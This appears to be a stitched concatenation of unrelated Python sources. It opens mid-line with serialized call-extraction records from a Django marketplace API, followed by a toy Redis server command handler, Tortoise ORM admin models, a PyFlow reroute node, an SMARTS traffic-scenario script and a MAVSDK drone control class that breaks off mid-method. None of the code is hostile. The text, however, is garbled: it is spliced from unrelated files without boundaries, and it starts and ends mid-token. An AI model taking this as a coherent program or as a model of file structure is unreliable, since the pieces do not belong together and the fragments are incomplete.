rest_framework.response import Response\n'), ((38766, 38813), 'ozpcenter.api.listing.model_access_es.SearchParamParser', 'model_access_es.SearchParamParser', (['self.request'], {}), '(self.request)\n', (38799, 38813), True, 'import ozpcenter.api.listing.model_access_es as model_access_es\n'), ((38833, 38894), 'ozpcenter.api.listing.model_access_es.suggest', 'model_access_es.suggest', (['current_request_username', 'params_obj'], {}), '(current_request_username, params_obj)\n', (38856, 38894), True, 'import ozpcenter.api.listing.model_access_es as model_access_es\n'), ((38910, 38954), 'rest_framework.response.Response', 'Response', (['results'], {'status': 'status.HTTP_200_OK'}), '(results, status=status.HTTP_200_OK)\n', (38918, 38954), False, 'from rest_framework.response import Response\n'), ((39062, 39110), 'ozpcenter.errors.NotImplemented', 'errors.NotImplemented', (['"""HTTP Verb Not Supported"""'], {}), "('HTTP Verb Not Supported')\n", (39083, 39110), False, 'from ozpcenter import errors\n'), ((39229, 39277), 'ozpcenter.errors.NotImplemented', 'errors.NotImplemented', (['"""HTTP Verb Not Supported"""'], {}), "('HTTP Verb Not Supported')\n", (39250, 39277), False, 'from ozpcenter import errors\n'), ((39394, 39442), 'ozpcenter.errors.NotImplemented', 'errors.NotImplemented', (['"""HTTP Verb Not Supported"""'], {}), "('HTTP Verb Not Supported')\n", (39415, 39442), False, 'from ozpcenter import errors\n'), ((39567, 39615), 'ozpcenter.errors.NotImplemented', 'errors.NotImplemented', (['"""HTTP Verb Not Supported"""'], {}), "('HTTP Verb Not Supported')\n", (39588, 39615), False, 'from ozpcenter import errors\n'), ((39733, 39781), 'ozpcenter.errors.NotImplemented', 'errors.NotImplemented', (['"""HTTP Verb Not Supported"""'], {}), "('HTTP Verb Not Supported')\n", (39754, 39781), False, 'from ozpcenter import errors\n'), ((2747, 2822), 'ozpcenter.api.listing.serializers.ReviewSerializer', 'serializers.ReviewSerializer', (['page'], {'context': "{'request': request}", 'many': '(True)'}), "(page, context={'request': request}, many=True)\n", (2775, 2822), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((8704, 8763), 'rest_framework.response.Response', 'Response', (["{'feedback': 0}"], {'status': 'status.HTTP_404_NOT_FOUND'}), "({'feedback': 0}, status=status.HTTP_404_NOT_FOUND)\n", (8712, 8763), False, 'from rest_framework.response import Response\n'), ((9823, 9865), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_404_NOT_FOUND'}), '(status=status.HTTP_404_NOT_FOUND)\n', (9831, 9865), False, 'from rest_framework.response import Response\n'), ((12269, 12357), 'ozpcenter.api.listing.serializers.ListingActivitySerializer', 'serializers.ListingActivitySerializer', (['page'], {'context': "{'request': request}", 'many': '(True)'}), "(page, context={'request': request},\n many=True)\n", (12306, 12357), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((13801, 13889), 'ozpcenter.api.listing.serializers.ListingActivitySerializer', 'serializers.ListingActivitySerializer', (['page'], {'context': "{'request': request}", 'many': '(True)'}), "(page, context={'request': request},\n many=True)\n", (13838, 13889), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((15169, 15257), 'ozpcenter.api.listing.serializers.ListingActivitySerializer', 'serializers.ListingActivitySerializer', (['page'], {'context': "{'request': request}", 'many': '(True)'}), "(page, context={'request': request},\n many=True)\n", (15206, 15257), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((17048, 17103), 'ozpcenter.model_access.get_profile', 'generic_model_access.get_profile', (['request.user.username'], {}), '(request.user.username)\n', (17080, 17103), True, 'import ozpcenter.model_access as generic_model_access\n'), ((17126, 17191), 'ozpcenter.api.listing.model_access.get_listing_by_id', 'model_access.get_listing_by_id', (['request.user.username', 'listing_pk'], {}), '(request.user.username, listing_pk)\n', (17156, 17191), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((17465, 17528), 'ozpcenter.api.listing.model_access.pending_delete_listing', 'model_access.pending_delete_listing', (['user', 'listing', 'description'], {}), '(user, listing, description)\n', (17500, 17528), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((17548, 17626), 'rest_framework.response.Response', 'Response', ([], {'data': "{'listing': {'id': listing.id}}", 'status': 'status.HTTP_201_CREATED'}), "(data={'listing': {'id': listing.id}}, status=status.HTTP_201_CREATED)\n", (17556, 17626), False, 'from rest_framework.response import Response\n'), ((19075, 19130), 'ozpcenter.model_access.get_profile', 'generic_model_access.get_profile', (['request.user.username'], {}), '(request.user.username)\n', (19107, 19130), True, 'import ozpcenter.model_access as generic_model_access\n'), ((19153, 19218), 'ozpcenter.api.listing.model_access.get_listing_by_id', 'model_access.get_listing_by_id', (['request.user.username', 'listing_pk'], {}), '(request.user.username, listing_pk)\n', (19183, 19218), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((19321, 19386), 'ozpcenter.api.listing.model_access.reject_listing', 'model_access.reject_listing', (['user', 'listing', 'rejection_description'], {}), '(user, listing, rejection_description)\n', (19348, 19386), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((19422, 19500), 'rest_framework.response.Response', 'Response', ([], {'data': "{'listing': {'id': listing.id}}", 'status': 'status.HTTP_201_CREATED'}), "(data={'listing': {'id': listing.id}}, status=status.HTTP_201_CREATED)\n", (19430, 19500), False, 'from rest_framework.response import Response\n'), ((26578, 26654), 'ozpcenter.api.listing.serializers.ListingSerializer', 'serializers.ListingSerializer', (['page'], {'context': "{'request': request}", 'many': '(True)'}), "(page, context={'request': request}, many=True)\n", (26607, 26654), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((30643, 30713), 'ozpcenter.errors.InvalidInput', 'errors.InvalidInput', (['"""Description is required when deleting a listing"""'], {}), "('Description is required when deleting a listing')\n", (30662, 30713), False, 'from ozpcenter import errors\n'), ((13400, 13467), 'ozpcenter.api.listing.model_access.get_all_listing_activities', 'model_access.get_all_listing_activities', (['self.request.user.username'], {}), '(self.request.user.username)\n', (13439, 13467), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((14724, 14791), 'ozpcenter.api.listing.model_access.get_all_listing_activities', 'model_access.get_all_listing_activities', (['self.request.user.username'], {}), '(self.request.user.username)\n', (14763, 14791), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((17359, 17446), 'ozpcenter.errors.InvalidInput', 'errors.InvalidInput', (['"""Description is required when pending a listing for deletion"""'], {}), "(\n 'Description is required when pending a listing for deletion')\n", (17378, 17446), False, 'from ozpcenter import errors\n'), ((17772, 17833), 'ozpcenter.errors.RequestException', 'errors.RequestException', (['"""Error pending listing for deletion"""'], {}), "('Error pending listing for deletion')\n", (17795, 17833), False, 'from ozpcenter import errors\n'), ((19646, 19696), 'ozpcenter.errors.RequestException', 'errors.RequestException', (['"""Error rejecting listing"""'], {}), "('Error rejecting listing')\n", (19669, 19696), False, 'from ozpcenter import errors\n'), ((30250, 30278), 'operator.itemgetter', 'operator.itemgetter', (['"""order"""'], {}), "('order')\n", (30269, 30278), False, 'import operator\n'), ((7457, 7502), 'ozpcenter.recommend.recommend_utils.ListIterator', 'recommend_utils.ListIterator', (['serializer.data'], {}), '(serializer.data)\n', (7485, 7502), False, 'from ozpcenter.recommend import recommend_utils\n'), ((7547, 7620), 'ozpcenter.pipe.pipes.ListingDictPostSecurityMarkingCheckPipe', 'pipes.ListingDictPostSecurityMarkingCheckPipe', (['self.request.user.username'], {}), '(self.request.user.username)\n', (7592, 7620), False, 'from ozpcenter.pipe import pipes\n'), ((7665, 7684), 'ozpcenter.pipe.pipes.LimitPipe', 'pipes.LimitPipe', (['(10)'], {}), '(10)\n', (7680, 7684), False, 'from ozpcenter.pipe import pipes\n'), ((26035, 26047), 'django.db.models.functions.Lower', 'Lower', (['field'], {}), '(field)\n', (26040, 26047), False, 'from django.db.models.functions import Lower\n'), ((7084, 7113), 'django.db.models.functions.Lower', 'Lower', (['"""owners__display_name"""'], {}), "('owners__display_name')\n", (7089, 7113), False, 'from django.db.models.functions import Lower\n'), ((25243, 25272), 'django.db.models.functions.Lower', 'Lower', (['"""owners__display_name"""'], {}), "('owners__display_name')\n", (25248, 25272), False, 'from django.db.models.functions import Lower\n'), ((25936, 25952), 'django.db.models.functions.Lower', 'Lower', (['field[1:]'], {}), '(field[1:])\n', (25941, 25952), False, 'from django.db.models.functions import Lower\n')] |
import re
import time
import random
from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array
class RedisCommand(object):
def __init__(self, command, arguments, database_manager):
self.command = command.upper()
self.arguments = arguments
self.num_databases = database_manager[0]
self.datastore = database_manager[1]
@classmethod
def from_handler(cls, arguments, datastore):
arguments = deserialize(arguments)
command = arguments[0]
arguments = arguments[1:]
return RedisCommand(command, arguments, datastore)
def execute(self):
return getattr(self, self.command)()
def QUIT(self):
return (1, serialize_string('OK'))
def PING(self):
if self.arguments:
return (0, serialize_string('{}'.format(' '.join(self.arguments))))
else:
return (0, serialize_string('PONG'))
def ECHO(self):
return (0, serialize_bulk_string('{}'.format(' '.join(self.arguments))))
def SELECT(self):
db = int(self.arguments[0])
if db > self.num_databases:
return (0, serialize_error('ERR DB index is out of range'))
else:
return (10 + db, serialize_string('OK'))
def COMMAND(self):
output = ''
for item in dir(self):
if item.isupper():
output += '{}\n'.format(item)
return (0, serialize_array('{}'.format(output)))
def KEYS(self):
if self.arguments[0] == '*':
pattern = '.*'
else:
pattern = self.arguments[0]
pattern = re.compile(pattern)
output = ''
for value in vars(self.datastore):
if pattern.search(value):
output += '{}\n'.format(value)
return (0, serialize_array('{}'.format(output)))
def FLUSHDB(self):
self.datastore.flush()
return (0, serialize_string('OK'))
def FLUSHALL(self):
return (20, serialize_string('OK'))
def SET(self):
key = self.arguments[0]
value = self.arguments[1]
options = self.arguments[2:]
mode = None
expire = None
for option in options:
if mode == 'EX':
expire = int(time.time()) + int(option)
mode = option
setattr(self.datastore, key, (value, expire))
return (0, serialize_string('OK'))
def GET(self):
key = self.arguments[0]
try:
value, expire = getattr(self.datastore, key)
if expire is not None and expire <= int(time.time()):
self.DEL(key)
raise Exception
else:
return (0, serialize_bulk_string('{}'.format(value)))
except:
return (0, serialize_bulk_string(None))
def DEL(self, key=None):
if key is None:
for index, key in enumerate(self.arguments):
try:
delattr(self.datastore, key)
except:
pass
return (0, serialize_integer('{}'.format(index + 1)))
else:
delattr(self.datastore, key)
def DBSIZE(self):
return (0, serialize_integer('{}'.format(len(vars(self.datastore)))))
def INCR(self):
key = self.arguments[0]
value, expire = getattr(self.datastore, key, (0, None))
try:
value = int(value) + 1
except:
return (0, serialize_error('ERR value is not an integer or out of range'))
setattr(self.datastore, key, (value, expire))
return (0, serialize_integer('{}'.format(value)))
def ZADD(self):
def byScore(item):
return item[0]
key = self.arguments[0]
score = self.arguments[1]
member = self.arguments[2]
array = getattr(self.datastore, key, list())
if [value for value in array if value[1] == member]:
array.remove(value)
array.append((score, member))
array = sorted(array, key=byScore)
setattr(self.datastore, key, array)
return (0, serialize_integer('1'))
def ZCARD(self):
key = self.arguments[0]
array = getattr(self.datastore, key, list())
return (0, serialize_integer('{}'.format(len(array))))
def ZRANK(self):
key = self.arguments[0]
member = self.arguments[1]
array = getattr(self.datastore, key, list())
if not [position for position, value in enumerate(array) if value[1] == member]:
return (0, serialize_bulk_string(None))
else:
return (0, serialize_integer('{}'.format([position for position, value in enumerate(array) if value[1] == member][0])))
def ZRANGE(self):
key = self.arguments[0]
start = int(self.arguments[1])
stop = int(self.arguments[2])
array = getattr(self.datastore, key, list())
if abs(start) > len(array):
return (0, serialize_array(''))
if abs(stop) > len(array) or stop == -1:
stop = None
output = ''
for value in [value[1] for value in array[start:stop]]:
output += '{}\n'.format(value)
return (0, serialize_array('{}'.format(output)))
def LPUSH(self):
key = self.arguments[0]
value = self.arguments[1]
array = getattr(self.datastore, key, list())
array.insert(0, value)
setattr(self.datastore, key, array)
return (0, serialize_integer('{}'.format(len(array))))
def RPUSH(self):
key = self.arguments[0]
value = self.arguments[1]
array = getattr(self.datastore, key, list())
array.append(value)
setattr(self.datastore, key, array)
return (0, serialize_integer('{}'.format(len(array))))
def LPOP(self):
key = self.arguments[0]
array = getattr(self.datastore, key, list())
try:
result = array.pop(0)
except IndexError:
result = None
return (0, serialize_bulk_string(result))
def RPOP(self):
key = self.arguments[0]
array = getattr(self.datastore, key, list())
try:
result = array.pop()
except IndexError:
result = None
return (0, serialize_bulk_string(result))
def SADD(self):
key = self.arguments[0]
member = self.arguments[1]
array = getattr(self.datastore, key, set())
array.add(member)
setattr(self.datastore, key, array)
return (0, serialize_integer('1'))
def HSET(self):
key = self.arguments[0]
k = self.arguments[1]
value = self.arguments[2]
data = getattr(self.datastore, key, dict())
data.update(k=value)
setattr(self.datastore, key, data)
return (0, serialize_integer('1'))
def SPOP(self):
key = self.arguments[0]
array = getattr(self.datastore, key, None)
if array is None:
return (0, serialize_bulk_string(None))
try:
result = array.pop()
except KeyError:
return (0, serialize_bulk_string(None))
setattr(self.datastore, key, array)
return (0, serialize_bulk_string(result))
def LRANGE(self):
key = self.arguments[0]
start = int(self.arguments[1])
stop = int(self.arguments[2])
array = getattr(self.datastore, key, list())
output = ''
if stop == -1:
stop = None
else:
stop += 1
for value in array[start:stop]:
output += '{}\n'.format(value)
return (0, serialize_array('{}'.format(output)))
def MSET(self):
arguments = iter(self.arguments)
for key in arguments:
setattr(self.datastore, key, (next(arguments), None))
return (0, serialize_string('OK'))
| [
"redis_protocol.protocol.serialize_integer",
"re.compile",
"redis_protocol.protocol.serialize_string",
"redis_protocol.protocol.serialize_array",
"redis_protocol.protocol.serialize_error",
"redis_protocol.protocol.deserialize",
"time.time",
"redis_protocol.protocol.serialize_bulk_string"
] | [((525, 547), 'redis_protocol.protocol.deserialize', 'deserialize', (['arguments'], {}), '(arguments)\n', (536, 547), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((1698, 1717), 're.compile', 're.compile', (['pattern'], {}), '(pattern)\n', (1708, 1717), False, 'import re\n'), ((781, 803), 'redis_protocol.protocol.serialize_string', 'serialize_string', (['"""OK"""'], {}), "('OK')\n", (797, 803), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((1997, 2019), 'redis_protocol.protocol.serialize_string', 'serialize_string', (['"""OK"""'], {}), "('OK')\n", (2013, 2019), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((2066, 2088), 'redis_protocol.protocol.serialize_string', 'serialize_string', (['"""OK"""'], {}), "('OK')\n", (2082, 2088), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((2470, 2492), 'redis_protocol.protocol.serialize_string', 'serialize_string', (['"""OK"""'], {}), "('OK')\n", (2486, 2492), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((4199, 4221), 'redis_protocol.protocol.serialize_integer', 'serialize_integer', (['"""1"""'], {}), "('1')\n", (4216, 4221), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((6124, 6153), 'redis_protocol.protocol.serialize_bulk_string', 'serialize_bulk_string', (['result'], {}), '(result)\n', (6145, 6153), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((6379, 6408), 'redis_protocol.protocol.serialize_bulk_string', 'serialize_bulk_string', (['result'], {}), '(result)\n', (6400, 6408), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((6639, 6661), 'redis_protocol.protocol.serialize_integer', 'serialize_integer', (['"""1"""'], {}), "('1')\n", (6656, 6661), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((6923, 6945), 'redis_protocol.protocol.serialize_integer', 'serialize_integer', (['"""1"""'], {}), "('1')\n", (6940, 6945), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((7315, 7344), 'redis_protocol.protocol.serialize_bulk_string', 'serialize_bulk_string', (['result'], {}), '(result)\n', (7336, 7344), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((7951, 7973), 'redis_protocol.protocol.serialize_string', 'serialize_string', (['"""OK"""'], {}), "('OK')\n", (7967, 7973), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((970, 994), 'redis_protocol.protocol.serialize_string', 'serialize_string', (['"""PONG"""'], {}), "('PONG')\n", (986, 994), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((1216, 1263), 'redis_protocol.protocol.serialize_error', 'serialize_error', (['"""ERR DB index is out of range"""'], {}), "('ERR DB index is out of range')\n", (1231, 1263), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((1308, 1330), 'redis_protocol.protocol.serialize_string', 'serialize_string', (['"""OK"""'], {}), "('OK')\n", (1324, 1330), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((4647, 4674), 'redis_protocol.protocol.serialize_bulk_string', 'serialize_bulk_string', (['None'], {}), '(None)\n', (4668, 4674), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((5066, 5085), 'redis_protocol.protocol.serialize_array', 'serialize_array', (['""""""'], {}), "('')\n", (5081, 5085), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((7100, 7127), 'redis_protocol.protocol.serialize_bulk_string', 'serialize_bulk_string', (['None'], {}), '(None)\n', (7121, 7127), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((2871, 2898), 'redis_protocol.protocol.serialize_bulk_string', 'serialize_bulk_string', (['None'], {}), '(None)\n', (2892, 2898), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((3556, 3618), 'redis_protocol.protocol.serialize_error', 'serialize_error', (['"""ERR value is not an integer or out of range"""'], {}), "('ERR value is not an integer or out of range')\n", (3571, 3618), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((7223, 7250), 'redis_protocol.protocol.serialize_bulk_string', 'serialize_bulk_string', (['None'], {}), '(None)\n', (7244, 7250), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((2344, 2355), 'time.time', 'time.time', ([], {}), '()\n', (2353, 2355), False, 'import time\n'), ((2668, 2679), 'time.time', 'time.time', ([], {}), '()\n', (2677, 2679), False, 'import time\n')] |
import datetime
from tortoise import Model, fields
from fastapi_admin.models import AbstractAdminLog, AbstractPermission, AbstractRole, AbstractUser
from .enums import ProductType, Status
class User(AbstractUser):
last_login = fields.DatetimeField(description="Last Login", default=datetime.datetime.now)
avatar = fields.CharField(max_length=200, default="")
intro = fields.TextField(default="")
created_at = fields.DatetimeField(auto_now_add=True)
def __str__(self):
return f"{self.pk}#{self.username}"
def rowVariant(self) -> str:
if not self.is_active:
return "warning"
return ""
def cellVariants(self) -> dict:
if self.is_active:
return {
"intro": "info",
}
return {}
class PydanticMeta:
computed = ("rowVariant", "cellVariants")
class Permission(AbstractPermission):
"""
must inheritance AbstractPermission
"""
class Role(AbstractRole):
"""
must inheritance AbstractRole
"""
class AdminLog(AbstractAdminLog):
"""
must inheritance AbstractAdminLog
"""
class Category(Model):
slug = fields.CharField(max_length=200)
name = fields.CharField(max_length=200)
created_at = fields.DatetimeField(auto_now_add=True)
def __str__(self):
return f"{self.pk}#{self.name}"
class Product(Model):
categories = fields.ManyToManyField("models.Category")
name = fields.CharField(max_length=50)
view_num = fields.IntField(description="View Num")
sort = fields.IntField()
is_reviewed = fields.BooleanField(description="Is Reviewed")
type = fields.IntEnumField(ProductType, description="Product Type")
image = fields.CharField(max_length=200)
body = fields.TextField()
created_at = fields.DatetimeField(auto_now_add=True)
def __str__(self):
return f"{self.pk}#{self.name}"
class Config(Model):
label = fields.CharField(max_length=200)
key = fields.CharField(max_length=20)
value = fields.JSONField()
status: Status = fields.IntEnumField(Status, default=Status.on)
def __str__(self):
return f"{self.pk}#{self.label}"
| [
"tortoise.fields.CharField",
"tortoise.fields.BooleanField",
"tortoise.fields.DatetimeField",
"tortoise.fields.ManyToManyField",
"tortoise.fields.IntEnumField",
"tortoise.fields.IntField",
"tortoise.fields.JSONField",
"tortoise.fields.TextField"
] | [((236, 313), 'tortoise.fields.DatetimeField', 'fields.DatetimeField', ([], {'description': '"""Last Login"""', 'default': 'datetime.datetime.now'}), "(description='Last Login', default=datetime.datetime.now)\n", (256, 313), False, 'from tortoise import Model, fields\n'), ((327, 371), 'tortoise.fields.CharField', 'fields.CharField', ([], {'max_length': '(200)', 'default': '""""""'}), "(max_length=200, default='')\n", (343, 371), False, 'from tortoise import Model, fields\n'), ((384, 412), 'tortoise.fields.TextField', 'fields.TextField', ([], {'default': '""""""'}), "(default='')\n", (400, 412), False, 'from tortoise import Model, fields\n'), ((430, 469), 'tortoise.fields.DatetimeField', 'fields.DatetimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (450, 469), False, 'from tortoise import Model, fields\n'), ((1175, 1207), 'tortoise.fields.CharField', 'fields.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (1191, 1207), False, 'from tortoise import Model, fields\n'), ((1219, 1251), 'tortoise.fields.CharField', 'fields.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (1235, 1251), False, 'from tortoise import Model, fields\n'), ((1269, 1308), 'tortoise.fields.DatetimeField', 'fields.DatetimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (1289, 1308), False, 'from tortoise import Model, fields\n'), ((1414, 1455), 'tortoise.fields.ManyToManyField', 'fields.ManyToManyField', (['"""models.Category"""'], {}), "('models.Category')\n", (1436, 1455), False, 'from tortoise import Model, fields\n'), ((1467, 1498), 'tortoise.fields.CharField', 'fields.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (1483, 1498), False, 'from tortoise import Model, fields\n'), ((1514, 1553), 'tortoise.fields.IntField', 'fields.IntField', ([], {'description': '"""View Num"""'}), "(description='View Num')\n", (1529, 1553), False, 'from tortoise import Model, fields\n'), ((1565, 1582), 'tortoise.fields.IntField', 'fields.IntField', ([], {}), '()\n', (1580, 1582), False, 'from tortoise import Model, fields\n'), ((1601, 1647), 'tortoise.fields.BooleanField', 'fields.BooleanField', ([], {'description': '"""Is Reviewed"""'}), "(description='Is Reviewed')\n", (1620, 1647), False, 'from tortoise import Model, fields\n'), ((1659, 1719), 'tortoise.fields.IntEnumField', 'fields.IntEnumField', (['ProductType'], {'description': '"""Product Type"""'}), "(ProductType, description='Product Type')\n", (1678, 1719), False, 'from tortoise import Model, fields\n'), ((1732, 1764), 'tortoise.fields.CharField', 'fields.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (1748, 1764), False, 'from tortoise import Model, fields\n'), ((1776, 1794), 'tortoise.fields.TextField', 'fields.TextField', ([], {}), '()\n', (1792, 1794), False, 'from tortoise import Model, fields\n'), ((1812, 1851), 'tortoise.fields.DatetimeField', 'fields.DatetimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (1832, 1851), False, 'from tortoise import Model, fields\n'), ((1951, 1983), 'tortoise.fields.CharField', 'fields.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (1967, 1983), False, 'from tortoise import Model, fields\n'), ((1994, 2025), 'tortoise.fields.CharField', 'fields.CharField', ([], {'max_length': '(20)'}), '(max_length=20)\n', (2010, 2025), False, 'from tortoise import Model, fields\n'), ((2038, 2056), 'tortoise.fields.JSONField', 'fields.JSONField', ([], {}), '()\n', (2054, 2056), False, 'from tortoise import Model, fields\n'), ((2078, 2124), 'tortoise.fields.IntEnumField', 'fields.IntEnumField', (['Status'], {'default': 'Status.on'}), '(Status, default=Status.on)\n', (2097, 2124), False, 'from tortoise import Model, fields\n')] |
from Qt import QtCore
from Qt import QtGui
from Qt.QtWidgets import QGraphicsItem
from PyFlow.Core.Common import getConnectedPins
from PyFlow.UI import RESOURCES_DIR
from PyFlow.UI.Utils.Settings import *
from PyFlow.UI.Canvas.Painters import NodePainter
from PyFlow.UI.Canvas.UINodeBase import UINodeBase
class UIRerouteNode(UINodeBase):
def __init__(self, raw_node):
super(UIRerouteNode, self).__init__(raw_node)
self.hover = False
self.headColorOverride = Colors.Gray
self.color = Colors.DarkGray
self.image = RESOURCES_DIR + "/reroute.svg"
def kill(self, *args, **kwargs):
inp = list(self.UIinputs.values())[0]
out = list(self.UIoutputs.values())[0]
newOuts = []
for i in self.UIoutputs.values():
for connection in i.connections:
newOuts.append([connection.destination(), connection.drawDestination])
if inp.connections:
source = inp.connections[0].source()
for out in newOuts:
drawSource = inp.connections[0].drawSource
self.canvasRef().connectPins(source, out[0])
super(UIRerouteNode, self).kill()
def postCreate(self, jsonTemplate=None):
super(UIRerouteNode, self).postCreate(jsonTemplate)
self.input = self.getPin("in")
self.output = self.getPin("out")
self.displayName = "reroute"
self.updateNodeShape()
def paint(self, painter, option, widget):
NodePainter.default(self, painter, option, widget)
| [
"PyFlow.UI.Canvas.Painters.NodePainter.default"
] | [((1497, 1547), 'PyFlow.UI.Canvas.Painters.NodePainter.default', 'NodePainter.default', (['self', 'painter', 'option', 'widget'], {}), '(self, painter, option, widget)\n', (1516, 1547), False, 'from PyFlow.UI.Canvas.Painters import NodePainter\n')] |
from pathlib import Path
from smarts.sstudio import gen_scenario
from smarts.sstudio import types as t
traffic_histories = [
t.TrafficHistoryDataset(
name=f"us101_{hd}",
source_type="NGSIM",
input_path=f"../../xy-trajectories/us101/trajectories-{hd}.txt",
speed_limit_mps=28,
default_heading=0,
)
for hd in ["0750am-0805am", "0805am-0820am", "0820am-0835am"]
]
gen_scenario(
t.Scenario(traffic_histories=traffic_histories), output_dir=Path(__file__).parent
)
| [
"smarts.sstudio.types.TrafficHistoryDataset",
"smarts.sstudio.types.Scenario",
"pathlib.Path"
] | [((131, 309), 'smarts.sstudio.types.TrafficHistoryDataset', 't.TrafficHistoryDataset', ([], {'name': 'f"""us101_{hd}"""', 'source_type': '"""NGSIM"""', 'input_path': 'f"""../../xy-trajectories/us101/trajectories-{hd}.txt"""', 'speed_limit_mps': '(28)', 'default_heading': '(0)'}), "(name=f'us101_{hd}', source_type='NGSIM', input_path\n =f'../../xy-trajectories/us101/trajectories-{hd}.txt', speed_limit_mps=\n 28, default_heading=0)\n", (154, 309), True, 'from smarts.sstudio import types as t\n'), ((434, 481), 'smarts.sstudio.types.Scenario', 't.Scenario', ([], {'traffic_histories': 'traffic_histories'}), '(traffic_histories=traffic_histories)\n', (444, 481), True, 'from smarts.sstudio import types as t\n'), ((494, 508), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (498, 508), False, 'from pathlib import Path\n')] |
#!/usr/bin/env python3
"""
Caveat when attempting to run the examples in non-gps environments:
`drone.offboard.stop()` will return a `COMMAND_DENIED` result because it
requires a mode switch to HOLD, something that is currently not supported in a
non-gps environment.
"""
import asyncio
from math import sqrt
from mavsdk import System
from mavsdk.offboard import (OffboardError, PositionNedYaw)
from time import perf_counter
from math import sqrt, cos, sin, pi
from multiprocessing import Process, Queue
class Drone:
def __init__(self):
self.msg_queue = Queue()
self.msg_queue2 = Queue()
self.msg_queue3 = Queue()
def _run(self):
asyncio.run(self.run())
def _send(self, *args):
self.msg_queue.put(tuple(args))
def _recv(self):
return self.msg_queue.get()
def _send2(self, *args):
self.msg_queue2.put(tuple(args))
def _recv2(self):
return self.msg_queue2.get()
def _send3(self):
self.msg_queue3.put(None)
def _recv3(self):
if self.msg_queue3.empty():
return False
else:
self.msg_queue3.get()
return True
def start(self):
self.p = Process(target=type(self)._run, args=((self),))
self.p.start()
return self.move(0, 0, 0)
def land(self):
self._send(2)
self.p.join()
def move(self, dx, dy, dz, speed=1):
self._send(0, dx, dy, dz, speed)
return self._recv2()
def turn(self, dyaw, speed=180):
self._send(1, dyaw, speed)
return self._recv2()
def move_nowait(self, dx, dy, dz, speed=1):
self._send(0, dx, dy, dz, speed)
def turn_nowait(self, dyaw, speed=1):
self._send(1, dyaw, speed)
def wait(self):
return self._recv2()
def stop(self):
self._send3()
return self._recv2()
async def run(self):
drone = System()
# await drone.connect(system_address="serial:///dev/ttyAMA0:460800")
await drone.connect(system_address="udp://:14551")
print("Waiting for drone to connect...")
async for state in drone.core.connection_state():
if state.is_connected:
print("Drone discovered!")
break
print("Waiting for drone to have a global position estimate...")
async for health in drone.telemetry.health():
if health.is_global_position_ok:
print("Global position estimate ok")
break
print("Fetching amsl altitude at home location....")
async for terrain_info in drone.telemetry.home():
pg0 = terrain_info.latitude_deg, terrain_info.longitude_deg, terrain_info.absolute_altitude_m
break
print("Fetching current heading...")
async for ahrs in drone.telemetry.attitude_euler():
yaw0 = ahrs.yaw_deg*pi/180
print("Current heading: %.2f" % yaw0)
break
print("-- Wait for arming")
async for armed in drone.telemetry.armed():
if armed:
break
print("-- Setting initial setpoint")
await drone.offboard.set_position_ned(PositionNedYaw(0.0, 0.0, 0.0, yaw0))
